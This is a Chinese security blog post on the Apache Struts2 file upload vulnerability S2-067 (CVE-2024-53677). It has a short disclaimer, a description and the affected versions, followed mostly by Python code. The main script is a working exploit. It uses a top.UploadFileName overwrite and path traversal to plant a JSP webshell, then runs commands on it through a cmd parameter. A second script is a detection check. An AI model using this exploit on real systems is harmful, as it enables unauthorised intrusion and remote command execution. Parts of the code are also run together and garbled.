Struts2任意文件上传漏洞S2-067(CVE-2024-53677)
要教会
阅读:1241
2025-04-23 08:18:10
评论:0
0x1 免责声明
本文旨在提供有关特定漏洞或安全风险的详细信息,以帮助安全研究人员、系统管理员和开发人员更好地理解和修复潜在的安全威胁,协助提高网络安全意识并推动技术进步,而非出于任何恶意目的。利用本文提到的漏洞信息或进行相关测试可能会违反法律法规或服务协议。“要教会”平台不对读者基于本文内容而产生的任何行为或后果承担责任。如有任何侵权问题,请联系作者删除。
0x2 简介
Apache Struts 框架中发现了一个严重漏洞 CVE-2024-53677,可能允许攻击者远程执行任意代码。此漏洞源于文件上传逻辑中的缺陷,可利用该缺陷执行路径遍历和恶意文件上传。
0x3 影响版本
Struts 2.0.0 – Struts 2.5.33
Struts 6.0.0 – Struts 6.3.0.2
此问题已在 Apache Struts 6.4.0 及更高版本中得到解决
import requests
import argparse
from urllib.parse import urljoin
from requests_toolbelt.multipart.encoder import MultipartEncoder
import random
import string
import os
def upload_file(target_url, upload_endpoint, file_paths, destination_path, allowed_types=None, allowed_extensions=None, simulate_i18n=False, execute_command=None):
""" Upload files to the target using parameter overwrite and path traversal.
"""
upload_url = urljoin(target_url, upload_endpoint)
print(f"[INFO] Uploading files to {upload_url}...")
headers = {"User-Agent": "Mozilla/5.0"}
for file_path in file_paths:
with open(file_path, "rb") as f:
file_content = f.read()
fields = {
"Upload": (os.path.basename(file_path), file_content, "text/plain"),
"top.UploadFileName": destination_path,
}
if simulate_i18n:
simulate_i18n_errors()
# Simulate MIME type and extension restrictions
if allowed_types:
headers["Content-Type"] = allowed_types
if allowed_extensions and not destination_path.endswith(tuple(allowed_extensions)):
print(f"[WARNING] File extension {destination_path.split('.')[-1]} might not be allowed.")
try:
m = MultipartEncoder(fields=fields, boundary='----WebKitFormBoundary' + ''.join(random.choices("abcdefghijklmnopqrstuvwxyz1234567890", k=16)))
headers["Content-Type"] = m.content_type
response = requests.post(upload_url, headers=headers, data=m, timeout=10)
if response.status_code == 200:
print(f"[SUCCESS] File {os.path.basename(file_path)} uploaded successfully: {destination_path}")
verify_uploaded_file(target_url, destination_path, execute_command)
else:
print(f"[ERROR] Upload failed for {os.path.basename(file_path)}. HTTP {response.status_code}")
except requests.RequestException as e:
print(f"[ERROR] Request failed for {os.path.basename(file_path)}: {e}")def verify_uploaded_file(target_url, file_path, execute_command):
"""Verify if the uploaded file is accessible and optionally execute a command."""
file_url = urljoin(target_url, file_path)
print(f"[INFO] Verifying uploaded file: {file_url}")
try:
response = requests.get(file_url, timeout=10)
if response.status_code == 200:
print(f"[ALERT] File uploaded and accessible: {file_url}")
if execute_command:
execute_remote_command(file_url, execute_command)
else:
print(f"[INFO] File not accessible. HTTP Status: {response.status_code}")
except requests.RequestException as e:
print(f"[ERROR] Verification failed: {e}")def execute_remote_command(file_url, command):
"""Execute a command on the uploaded WebShell."""
command_url = f"{file_url}?cmd={command}"
print(f"[INFO] Executing command: {command_url}")
try:
response = requests.get(command_url, timeout=10)
if response.status_code == 200:
print(f"[INFO] Command output:\n{response.text}")
else:
print(f"[ERROR] Command execution failed. HTTP Status: {response.status_code}")
except requests.RequestException as e:
print(f"[ERROR] Command execution failed: {e}")def simulate_i18n_errors():
"""Simulate i18n file error handling scenarios."""
errors = {
"struts.messages.error.uploading": "Error uploading file.",
"struts.messages.error.file.too.large": "The file size exceeds the maximum limit.",
"struts.messages.error.content.type.not.allowed": "The file type is not allowed.",
"struts.messages.error.file.extension.not.allowed": "The file extension is not allowed."
}
for key, message in errors.items():
print(f"[I18N SIMULATION] {key}: {message}")def predefined_paths():
"""Return a list of common test paths for path traversal."""
return [
"../../../../../webapps/ROOT/test.jsp",
"/tmp/webshell.jsp",
"/var/www/html/shell.jsp"
]def main():
parser = argparse.ArgumentParser(description="S2-067 Exploit - Testing Deprecated File Upload Interceptor with Multiple File Uploads")
parser.add_argument("-u", "--url", required=True, help="Target base URL (e.g., http://yaojiaohui.net)")
parser.add_argument("--upload_endpoint", required=True, help="Path to upload endpoint (e.g., /uploads.action)")
parser.add_argument("--files", required=True, help="Comma-separated list of file paths to upload")
parser.add_argument("--destination", required=True, help="Target destination path for uploaded files")
parser.add_argument("--allowed_types", help="Simulated allowed MIME types (e.g., application/octet-stream)")
parser.add_argument("--allowed_extensions", nargs="+", help="Simulated allowed file extensions (e.g., .jsp, .txt)")
parser.add_argument("--simulate_i18n", action="store_true", help="Simulate i18n error handling scenarios")
parser.add_argument("--execute", help="Command to execute on the uploaded file (e.g., whoami)")
args = parser.parse_args()
file_paths = args.files.split(",")
upload_file(
target_url=args.url,
upload_endpoint=args.upload_endpoint,
file_paths=file_paths,
destination_path=args.destination,
allowed_types=args.allowed_types,
allowed_extensions=args.allowed_extensions,
simulate_i18n=args.simulate_i18n,
execute_command=args.execute
)if __name__ == "__main__": main()import requestsimport argparseimport loggingfrom urllib.parse import urljoinfrom requests_toolbelt.multipart.encoder
import MultipartEncoderimport random# Configure logginglogging.basicConfig(
level=logging.INFO,
format="%(asctime)s [%(levelname)s] %(message)s",
handlers=[logging.StreamHandler()])def detect_vulnerability(target_url, upload_endpoint):
""" Non-destructive detection of CVE-2024-53677.
"""
logging.info("Starting detection for CVE-2024-53677 (S2-067)...")
upload_url = urljoin(target_url, upload_endpoint)
test_filename = "../../vuln_test.txt"
harmless_content = "S2-067 detection test." # Attempt to overwrite file name using OGNL binding
files = { "upload": ("test.txt", harmless_content, "text/plain"),
"top.uploadFileName": test_filename # Attempt filename overwrite
}
# Custom Content-Type boundary
boundary = "----WebKitFormBoundary" + "".join(random.choices("abcdefghijklmnopqrstuvwxyz0123456789", k=16))
m = MultipartEncoder(fields=files, boundary=boundary)
headers = { "User-Agent": "Mozilla/5.0",
"Content-Type": m.content_type }
logging.info(f"Sending test request to upload endpoint: {upload_url}")
try:
# Send file upload request
response = requests.post(upload_url, headers=headers, data=m, timeout=10)
# Analyze HTTP response
if response.status_code == 200:
logging.info("[INFO] File upload request succeeded.")
if "vuln_test.txt" in response.text:
logging.warning("[ALERT] File name overwrite detected. Target may be vulnerable!")
else: logging.info("[INFO] Target does not appear vulnerable.")
elif response.status_code in [403, 401]:
logging.info("[INFO] Access denied. Ensure proper permissions.")
else:
logging.info(f"[INFO] Unexpected HTTP response: {response.status_code}")
except requests.exceptions.RequestException as e:
logging.error(f"[ERROR] Request failed: {e}")def main():
parser = argparse.ArgumentParser(description="CVE-2024-53677 (S2-067) Non-destructive Detection Tool")
parser.add_argument("-u", "--url", required=True, help="Target base URL (e.g., http://yaojiaohui.net)")
parser.add_argument("--upload_endpoint", required=True, help="Path to file upload endpoint (e.g., /upload.action)")
args = parser.parse_args()
logging.info("Starting detection process...")
detect_vulnerability(args.url, args.upload_endpoint)
logging.info("Detection process completed.")if __name__ == "__main__":
main()本文为要教会原创,欢迎转载分享。转载时请务必在文章页面明显位置提供本文链接并注明出处。感谢您对知识的尊重和对本文的肯定!本文链接网址:https://yaojiaohui.net/wangluoanquan/1360.html
声明
1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。


支付宝打赏
微信打赏 






